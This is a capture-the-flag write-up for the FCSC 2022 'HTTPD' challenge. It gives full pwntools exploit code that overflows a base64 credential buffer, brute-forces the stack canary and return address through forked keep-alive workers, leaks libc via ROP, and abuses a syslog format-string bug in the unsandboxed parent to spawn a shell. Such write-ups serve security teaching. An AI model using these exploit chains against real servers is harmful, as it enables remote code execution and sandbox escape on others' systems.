[FCSC 2022] Pwn - HTTPD (⭐⭐⭐)

Description

On vous demande d’auditer ce serveur web sandboxé.

nc challenges.france-cybersecurity-challenge.fr 2058

Note : le binaire à exploiter n’a pas accès à Internet.

Translation:

You are asked to audit this sandboxed web server.

nc challenges.france-cybersecurity-challenge.fr 2058

Note: the binary to exploit has no Internet access.

The source code

The source code is available with this challenge. We have the following files:

audit.c / audit.h
- Contains the audit function. Apparently just logging things. If it’s here, it might be useful at some point, so don’t forget to check it out.
base64.c / base64.h
- Contains the b64_decode function. By looking at the function signature, it seems like there is no check for the output buffer size. It smells like a buffer overflow 👀.
debug.h
- Defines a macro for logging debug messages. There may be a format string bug in there, so don’t forget to check it out.
http.c / http.h
- Contains the main functions for parsing the HTTP request and sending the response. I think this is just the web server plumbing and nothing really interesting. It might still be worth reading in order to understand the code better.
worker.c / worker.h
- Seems to contain the code that manages how the web server is actually running.
httpd.c
- Contains the main function for the web server (calling the worker function) and the sandbox activation.

Test the code

We have an overview of the code. But we still don’t know what it does. So, let’s try to run the code.

$ ./httpd

And now the program hangs. No socket seems to be created, which is weird for a web server. Looking at the code, we can see that the program simply uses standard input and output.

$ nc -lvp 8080 -e ./httpd

Now we can communicate with the server through a web browser, on http://localhost:8080.

Authentication

When we open the page, we are asked for a username and a password.

First thing every hacker would do is to type admin and admin in the form. And of course, it works 🙃.

We like memes here 🙂

But we still don’t have the flag, so we need to search for a better vulnerability.

You said base64?

As we saw in the source code, there is a b64_decode function:

bool b64_decode(const char *in, size_t size, char *out);

And as I said before, we don’t give the size of the output buffer to the function. There are two possible scenarios:

The size is hardcoded in the function (which is not a good idea).
The function doesn’t care about the size of the output buffer (which is even worse).

I don’t want to read the entire source code, so let’s just read the important parts and try to overflow the buffer.

bool checkAuth(const char *b64, struct shared *shared)
{
	char creds[0x100] = {};

	if(true != b64_decode(b64, strlen(b64), creds)) {
		askAuth("Malformed base64");
		return false;
	}

	DEBUG("creds = %s\n", creds);

    /*
    ...
    */
}

Here, in the worker.c file, we can see that the creds buffer is 0x100 bytes long. Let’s try to overflow it, by sending this request:

GET / HTTP/1.1
Authorization: Basic YWRtaW46YWRtaW4AYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYQ==

The base64 decodes to the string admin:admin\0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...aaaaaaaaa (where \0 is the null terminator). Sending admin:admin is probably useless, but since I haven’t really read the source code yet, I prefer to include it so that we are logged in, in case that turns out to be useful.
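
The request does not have to be assembled by hand. As a minimal sketch (the helper name `build_request` and the filler length are illustrative choices, not taken from the challenge), the following builds the same kind of request and checks that the decoded credentials are longer than the 0x100-byte creds buffer:

```python
import base64

CREDS_SIZE = 0x100  # size of the creds buffer in checkAuth


def build_request(payload: bytes) -> bytes:
    """Wrap raw bytes in a Basic Authorization header (hypothetical helper)."""
    token = base64.b64encode(payload)
    return b"GET / HTTP/1.1\r\nAuthorization: Basic " + token + b"\r\n\r\n"


# Valid credentials, a NUL terminator, then filler that runs past the buffer.
payload = b"admin:admin\0" + b"a" * 0x300  # filler length is arbitrary
request = build_request(payload)

# Base64 turns every 3 input bytes into 4 output characters.
token = request.split(b"Basic ")[1].strip()
decoded = base64.b64decode(token)
print(len(token), len(decoded), len(decoded) > CREDS_SIZE)
```

Since b64_decode receives no output size, nothing on the server side appears to perform the last comparison, which is why the long header is worth trying.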

$ printf 'GET / HTTP/1.1\r\nAuthorization: Basic YWRtaW46YWRtaW4AYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYQ==\r\n\r\n' | ./httpd

And we got no answer, so it seems that the program has crashed as we expected.

Just a buffer overflow 😏

We found a vulnerability, so let’s try to exploit it.

from pwn import *

context.binary = elf = ELF('./httpd')
libc = ELF('./libc.so.6')
ld = ELF('./ld-linux-x86-64.so.2')

[*] '/home/lucas/CTF/FCSC/Pwn/httpd/write_up/httpd'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/home/lucas/CTF/FCSC/Pwn/httpd/write_up/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/home/lucas/CTF/FCSC/Pwn/httpd/write_up/ld-linux-x86-64.so.2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

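Sadly, the program has every security feature enabled, so a plain stack smash will not work: the canary aborts the process before the overwritten return address is used, and PIE / ASLR hide the addresses we would want to jump to. The only way I see to bypass ASLR / PIE / Canary is to bruteforce everything byte by byte in order to leak the data we need.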

By looking a bit more at the source code, we find some code about the keepalive feature:

static inline bool shouldKeepAlive(const struct http_request *req)
{
	struct http_header *header = http_findHeader(req, "connection");

	if(NULL == header)
		return false;

	return 0 == strcasecmp(header->value, "keep-alive");
}

The main loop (in the parent process):

/* Main loop */
do {
    int status = request(shared);
    DEBUG("status = %d\n", status);
    audit(shared, status);
} while(shared->keepalive);

And the requests are handled in child processes (forked from the parent process):

static int request(struct shared *shared)
{
	pid_t pid = fork();

	if(0 > pid) {
		perror("fork");
		exit(EXIT_FAILURE);
	}

	if(0 == pid) {
		sandbox(shared);
		_exit(EXIT_FAILURE);
	}

	int status;
	if(pid != waitpid(pid, &status, 0)) {
		perror("waitpid");
		exit(EXIT_FAILURE);
	}

	return status;
}

So we can bruteforce everything like we wanted if we add the header Connection: keep-alive.
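
To see why the fork matters, here is a small POSIX-only toy model of the request function. It is not the server's code: SIGKILL merely stands in for whatever signal kills the real child when the stack is smashed, and the function names are made up for the illustration. The point is that a dying child only produces a wait status, and the parent keeps looping.

```python
import os
import signal


def run_in_child(crash: bool) -> int:
    """Fork, let the child exit cleanly or die from a signal, return the wait status."""
    pid = os.fork()
    if pid == 0:
        if crash:
            # Stand-in for a crash: the child is killed by a signal.
            os.kill(os.getpid(), signal.SIGKILL)
        os._exit(0)
    _, status = os.waitpid(pid, 0)
    return status


def describe(status: int) -> str:
    """Decode a wait status the same way the WIF* macros do in C."""
    if os.WIFEXITED(status):
        return "exited with code %d" % os.WEXITSTATUS(status)
    if os.WIFSIGNALED(status):
        return "killed by signal %d" % os.WTERMSIG(status)
    return "unknown status %d" % status


# The parent survives every crash and can serve the next request.
for crash in (False, True, False):
    print(describe(run_in_child(crash)))
```

Because each child is a copy of the same parent, secrets such as the canary and the memory layout are identical from one request to the next, which is what makes guessing them incrementally possible.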

from base64 import b64encode

p = remote("challenges.france-cybersecurity-challenge.fr", 2058, level='error')


def test_payload(payload, timeout=.1):
    p.send(b'GET / HTTP/1.1\r\nconnection: keep-alive\r\nAuthorization: Basic ' +
           b64encode(payload) + b'\r\n\r\n')
    return p.recv(timeout=timeout)


## Bruteforce the offset
offset = 0x100

offset_log = log.progress('Offset')

while test_payload(flat({0: b'admin:admin\0', 0x100: b'A' * (offset - 0x100)})):
    offset_log.status(str(offset))
    offset += 1

offset -= 1

offset_log.success(str(offset))


## Bruteforce the canary
canary_log = log.progress('Canary')

canary = b'\x00'
while len(canary) != 8:
    tmp = 0
    while not test_payload(flat({0: b'admin:admin\0', offset: canary + p8(tmp)})).startswith(b'HTTP/1.1 200 OK'):
        canary_log.status('0x%x' % u64((canary + p8(tmp)).ljust(8, b'\0')))
        tmp += 1
        tmp %= 256
    p.recv(timeout=1)

    canary += p8(tmp)

canary_log.success('0x%x' % u64(canary.ljust(8, b'\0')))


## Bruteforce the RIP
rip_log = log.progress('RIP')

rip = b'\x9e'
while len(rip) != 6:
    tmp = 0
    while not test_payload(flat({0: b'admin:admin\0', offset: canary, offset + 16: rip + p8(tmp)})).startswith(b'HTTP/1.1 200 OK'):
        rip_log.status('0x%x' % u64((rip + p8(tmp)).ljust(8, b'\0')))
        tmp += 1
        tmp %= 256
    p.recv(timeout=1)

    rip += p8(tmp)

rip_log.success('0x%x' % u64(rip.ljust(8, b'\0')))

p.recv(timeout=1)

[+] Offset: 264
[+] Canary: 0x87f031db50917e00
[+] RIP: 0x6160213fb89e

So, we bruteforced the canary and the return address. You can see that I have hardcoded the least significant byte of the canary to 0x00, and the one from the return address to 0x9e (which can be obtained by disassembling the program).
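
The cost of this approach is easy to check offline. The sketch below replaces the remote server with a local oracle function (an assumption made purely for the illustration): it answers True when the overwritten bytes match the start of the secret, like a child that survives and replies 200 OK, and False otherwise, like a child that crashes.

```python
import os


def make_oracle(secret: bytes):
    """Return a function that mimics one keep-alive request.

    The secret never changes between calls, like a canary inherited
    through fork().
    """
    def oracle(guess: bytes) -> bool:
        # A partial overwrite leaves the remaining bytes untouched, so the
        # check passes as soon as the overwritten prefix is correct.
        return secret.startswith(guess)
    return oracle


def brute_force(oracle, known: bytes, total: int):
    """Recover `total` bytes one at a time, starting from a known prefix."""
    attempts = 0
    while len(known) < total:
        for candidate in range(256):
            attempts += 1
            if oracle(known + bytes([candidate])):
                known += bytes([candidate])
                break
        else:
            raise RuntimeError("no candidate byte was accepted")
    return known, attempts


# Hypothetical canary: the low byte is 0x00, the other seven are random.
secret = b"\x00" + os.urandom(7)
recovered, attempts = brute_force(make_oracle(secret), b"\x00", 8)
print(recovered == secret, attempts)
```

Seven unknown bytes cost at most 7 * 256 = 1792 requests, instead of the 2^56 guesses a full-value search would need.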

We can now get the base address of our program, from the leaked return address:

base = u64(rip.ljust(8, b'\0')) - 0x289e

elf.address = base

info("Base: 0x%x" % base)

[*] Base: 0x6160213f9000
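
The arithmetic can be double-checked without pwntools. This sketch reuses the values printed in this run; `rebase` is a hypothetical helper added for the example. It also shows why the low byte 0x9e could be hardcoded: a page-aligned base never changes the low 12 bits of an address.

```python
PAGE_SIZE = 0x1000

leaked_rip = 0x6160213FB89E  # value printed by the brute force in this run
ret_offset = 0x289E          # offset of that return address inside the binary

base = leaked_rip - ret_offset
assert base % PAGE_SIZE == 0, "a PIE base should be page aligned"


def rebase(offset: int) -> int:
    """Turn an offset inside the binary into a runtime address (hypothetical helper)."""
    return base + offset


# The low 12 bits survive randomisation, so they match the static offset.
print(hex(base), hex(leaked_rip & 0xFFF), hex(ret_offset & 0xFFF))
```

If the subtraction did not give a page-aligned value, either the leaked address or the assumed offset would be wrong.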

THE RCEEEEE !!!!!!!!!!

Yeah ! We got the RCE ! We can execute code on the remote server by overwriting the return address with the address of the function we want to execute ! This is awesome !!!

But …

The sandbox …

Yes, we can execute functions .. but this is still sandboxed.

I gave you a meme .. so read my write up please 🙂

According to the seccomp configuration, we can only execute the following syscalls:

SYS_read
SYS_write
SYS_sigreturn
SYS_exit
SYS_brk
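
To get a feeling for what this allowlist rules out, here is a rough model. The plans and the syscalls they need are illustrative guesses, not something read from the challenge; the only data taken from the source is the allowlist itself.

```python
# Allowlist from the seccomp configuration, without the SYS_ prefix.
ALLOWED = {"read", "write", "sigreturn", "exit", "brk"}

# Syscalls that typical post-exploitation steps would need (illustrative).
PLANS = {
    "spawn a shell": ["execve"],
    "open and print the flag": ["open", "read", "write"],
    "talk over stdin/stdout": ["read", "write"],
}


def blocked(needed):
    """Return the syscalls of a plan that the allowlist does not permit."""
    return [name for name in needed if name not in ALLOWED]


for plan, needed in PLANS.items():
    missing = blocked(needed)
    print(plan, "->", "ok" if not missing else "blocked by " + ", ".join(missing))
```

Under these assumptions, code running in the child can still exchange bytes with us, but it can neither start a shell nor open a new file.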

This was my first time dealing with seccomp, so I didn’t really know what I could do about these restrictions …

The wrong way

After a bit of research I found that what we have here is the strict mode of seccomp, plus SYS_brk. I then spent some hours trying to find out why SYS_brk is not allowed in strict mode. Is it dangerous? Can we exploit something using it?

I never got an answer about this, so I think there is no specific reason for this. They just enabled the essential syscalls, and didn’t care about the rest.

The right way

I realized, after some hours, that the seccomp configuration is not applied everywhere. The parent process needs to fork itself in order to handle the requests. So, the sandbox cannot be applied to the parent process.

And what if there is another vulnerability ? One that can be exploited in the parent process, from a child process ?

Finally reading the source code ?

The parent process does few things, so if there is a vulnerability, it should be easy to find.

Main loop:

/* Main loop */
do {
    int status = request(shared);
    DEBUG("status = %d\n", status);
    audit(shared, status);
} while(shared->keepalive);

There are 3 things:

request: the function that handles the requests
- Needs to be checked, there might be a vulnerability in it
DEBUG: the macro that prints some debug information
- As I said before, we need to check for format string vulnerabilities, but in the given code, it seems like it is correctly used
audit: the function that logs some information
- Do you remember when I said that this should be useful at some point ? Let’s see if we can find a vulnerability in it. I’m pretty confident about this, so let’s check it first.

The audit function

The audit function is pretty simple:

void audit(const struct shared *shared, int status)
{
	/* Do not log failed attempts, exit early */
	if(WIFEXITED(status) && !shared->loggedin)
		return;

	/* Initialize the logger */
	static bool init = false;

	if(!init) {
		openlog(IDENT, 0, LOG_DAEMON);
		init = true;
	}

	/* Determine the message and priority */
	char msg[0x200];
	int prio;

	if(WIFEXITED(status)) {
		/* Keep track of connections in the audit log */
		snprintf(msg, sizeof(msg), "LOGIN %s", shared->username);
		prio = LOG_NOTICE;
	} else if(WIFSIGNALED(status)) {
		/* Signal ? We should warn about this */
		snprintf(msg, sizeof(msg), "SIGNAL %d", WTERMSIG(status));
		prio = LOG_WARNING;
	} else {
		/* ??? */
		snprintf(msg, sizeof(msg), "UNKNOWN %d", status);
		prio = LOG_CRIT;
	}

	/* Send the actual message to the logger */
	syslog(prio, msg, 0);
}

It manages the msg buffer, and the prio variable, in order to print the correct message after each loop.

I don’t see any buffer overflow on the msg buffer, so I think it’s pretty safe.

But at the end of the function, we have a syslog call. I don’t know this function, I never used it, so let’s read the manpage:

void syslog(int priority, const char *format, ...);

Hum … are you telling me that there is a format string vulnerability? Let’s check in a custom program whether we can exploit this using %n, like we do all the time with printf:

#include <stdio.h>
#include <syslog.h>

int main(){
	int v = 0xdeadbeef;
	syslog(LOG_CRIT, "Hello %n", &v);
	printf("%x\n", v);
}

And the program prints 6, the length of "Hello ", so %n works with syslog exactly as it does with printf.

Triggering the format string

We have to control the content of the msg buffer, passed to syslog, in order to trigger the format string.

There are multiple cases:

Normal connection:
- The message is LOGIN <username> (the username is always admin since this is the only user we have)
Signal:
- The message is SIGNAL <signal>, we do not control the signal number, and even if we did, this would not allow us to trigger the format string.
Unknown:
- The message is UNKNOWN <status>, we do not control the status, and even if we did, this would not allow us to trigger the format string.

So, the only way to trigger the format string is to control the username. It is stored in the shared structure, which is shared between the parent and the child processes. If we could use our buffer overflow to trigger a ROP chain that would allow us to control the username, we would be able to trigger the format string, and then control the return address of the parent process, which would allow us to execute arbitrary code.
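
The bug comes from formatting the message twice: snprintf copies the username into msg verbatim, then syslog parses msg as a format. The sketch below models both passes in Python. The regular expression is a rough approximation of printf conversions written for this example, not glibc's real parser, and the second username is a made-up value.

```python
import re

# Rough pattern for printf-style conversions, including positional ones
# such as %12$hhn. It is a simplification, not glibc's real parser.
DIRECTIVE = re.compile(
    r"%(?:\d+\$)?[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l|j|z|t|L)?[diouxXeEfFgGaAcspn]"
)


def build_msg(username: str) -> str:
    """First pass: what snprintf(msg, sizeof(msg), "LOGIN %s", username) produces."""
    return "LOGIN %s" % username


def directives_seen_by_syslog(msg: str):
    """Second pass: conversions syslog would find when msg is used as its format."""
    return DIRECTIVE.findall(msg)


for username in ("admin", "ad%12$hhn"):
    msg = build_msg(username)
    print(repr(msg), directives_seen_by_syslog(msg))
```

With the normal username the second pass finds nothing to interpret. As soon as the username contains a conversion, syslog acts on it, which is exactly what we need a way to write into the shared structure for.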

THE RCEEEEE !!!!!!!!!! (for real this time ?)

Leaking the libc base address

We need to know where the libc is loaded in memory. We will use this information to find the address of a one gadget (a single gadget that triggers execve("/bin/sh", NULL, NULL)) and the address of the stack (from the _environ symbol) in order to overwrite the return address.

We also could have checked for the libc version, and if it is old enough, we could have tried to use __free_hook or __malloc_hook to trigger the one gadget, but this might be harder, and this is not reliable for every libc, so I tend to avoid it nowadays when this is possible.

@MemLeak.String
def leak(addr):
    rop = ROP(elf)
    rop.puts(addr)
    rop.exit(0)
    payload = flat({
        0: b'admin:admin\0',
        offset: canary,
        offset + 16: rop
    })

    return test_payload(payload, 1)[:-1]


free_addr = u64(leak[elf.got.free:elf.got.free + 8])

info("free: 0x%x" % free_addr)

libc.address = free_addr - libc.symbols.free

info("libc: 0x%x" % libc.address)

environ_addr = u64(leak[libc.symbols['__environ']:libc.symbols['__environ'] + 8])

info("environ: 0x%x" % environ_addr)

[*] Loaded 14 cached gadgets for './httpd'
[*] free: 0x74fe3b0d1740
[*] libc: 0x74fe3b03a000
[*] environ: 0x7ffc03bccbd8
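
One detail of the leak is worth spelling out: puts stops at the first NUL byte (and appends a newline, which the `[:-1]` above strips), so a 6-byte address followed by two zero bytes cannot be read in a single call. As far as I understand it, the MemLeak.String wrapper handles this by treating each result as a NUL-terminated string. The toy model below shows the idea on a fake memory region; `BASE`, `MEMORY` and both functions are invented for the example and are not pwntools APIs.

```python
import struct

# Toy memory: a GOT-like slot holding a 6-byte address padded with two NULs.
BASE = 0x1000
MEMORY = struct.pack("<Q", 0x74FE3B0D1740) + b"next data\0"


def puts_leak(addr: int) -> bytes:
    """Mimic puts(addr): return the bytes up to, not including, the first NUL."""
    start = addr - BASE
    end = MEMORY.index(b"\0", start)
    return MEMORY[start:end]


def read_bytes(addr: int, size: int) -> bytes:
    """Read exactly `size` bytes, re-adding the NUL that ended each string."""
    out = b""
    while len(out) < size:
        out += puts_leak(addr + len(out)) + b"\0"
    return out[:size]


value = struct.unpack("<Q", read_bytes(BASE, 8))[0]
print(hex(value))
```

An empty answer is therefore still information: it means the byte at that address is zero, and the next request simply starts one byte further.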

Now, we can get the address of the shared structure, and where the return address is stored.

shared_address = u64(
    leak[environ_addr - 0x110:environ_addr - 0x108]
)

info("shared: 0x%x" % shared_address)


# Print the username, in order to check that we have the correct address
username = leak(shared_address + 2)

info("username: %s" % username)

[*] shared: 0x74fe3b227000
[*] username: b'admin\x00'

Now, let’s search for a one gadget:

$ one_gadget libc.so.6
0xde78c execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xde78f execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xde792 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL

I already tested all of them, and the last one is working, so let’s use it in our exploit.

new_ret = libc.address + 0xde792

And exploit the format string in order to overwrite the return address.

for i in range(8):
    ret = new_ret & 0xff
    new_ret >>= 8
    write = fmtstr.AtomWrite(environ_addr - 0x100 + i, 1, ret)
    a, b = fmtstr.make_payload_dollar(12, write, 8)
    payload = flat({
        0: a,
        16: b
    })

    rop = ROP(libc)
    rop.read(0, shared_address+4, len(payload))
    rop(rax=constants.SYS_exit, rdi=0)
    rop.raw(rop.syscall.address)

    test_payload(flat({
        0: b'admin:admin\0',
        offset: canary,
        offset + 16: rop,
    }))

    p.send(payload)

[*] Loaded 193 cached gadgets for './libc.so.6'
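
The loop above writes the new return address one byte per request. The arithmetic behind each write can be sketched without pwntools: a %hhn conversion stores the low byte of the number of characters printed so far, so the payload has to pad the output until that count matches the wanted byte modulo 256. The helper names below are made up. The value 8 is the numbwritten argument used above; my reading, which the code does not state explicitly, is that it counts "LOGIN " plus the two username bytes that sit before shared_address+4.

```python
def split_le(value: int, size: int = 8):
    """Little-endian bytes of value, lowest byte first."""
    return [(value >> (8 * i)) & 0xFF for i in range(size)]


def hhn_padding(target: int, already_written: int) -> int:
    """Extra characters to print so the running count ends in `target` (mod 256)."""
    return (target - already_written) % 256


new_ret = 0x74FE3B03A000 + 0xDE792  # libc base + one gadget offset from this run
prefix = 8                          # numbwritten value passed to make_payload_dollar

for i, byte in enumerate(split_le(new_ret)):
    # Byte i goes to the address of the saved return address plus i.
    print(i, hex(byte), hhn_padding(byte, prefix))
```

Writing single bytes keeps every padding value below 256, so each format string stays short.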

Now that the return address is overwritten, we just have to get out of the main loop by setting the keepalive variable to false, i.e. by not including the Connection: keep-alive header in the request.

p.send(b'GET / HTTP/1.1\r\n\r\n')

p.recv(timeout=1)
p.sendline(b'cat flag.txt')
flag = p.recv(timeout=1)
success("Flag: %s" % flag.decode())

[+] Flag: FCSC{d87c69143541ae0d3e43f8d65bff7072646cdc781167b89aedf0146cb20ed3cd}

Conclusion

This was a great challenge. When I saw it, I instantly wanted to solve it.

But of course, when I solve a challenge, the most important thing is what I learned from it.

What I learned

First thing, I didn’t know seccomp. I watched some videos and read some documentation, and I learned how powerful it is when you want to create a sandbox. I don’t know whether there are ways to escape or disable the sandbox when it is not configured correctly, but I will try to read more documentation on this topic.

But the most important thing, and the one that made me waste a lot of time, was that I got stuck on the wrong idea. I wanted to use brk in order to bypass the sandbox, but I couldn’t. Yet during the recon, I had found the audit function and I already knew that it would probably be useful (nothing is useless when you want to solve a challenge: when a piece of code is here, it is probably for a reason). So next time, when I need to figure out what I can do, I will go back to what I found in the recon phase instead of rushing headlong towards the first idea that I have.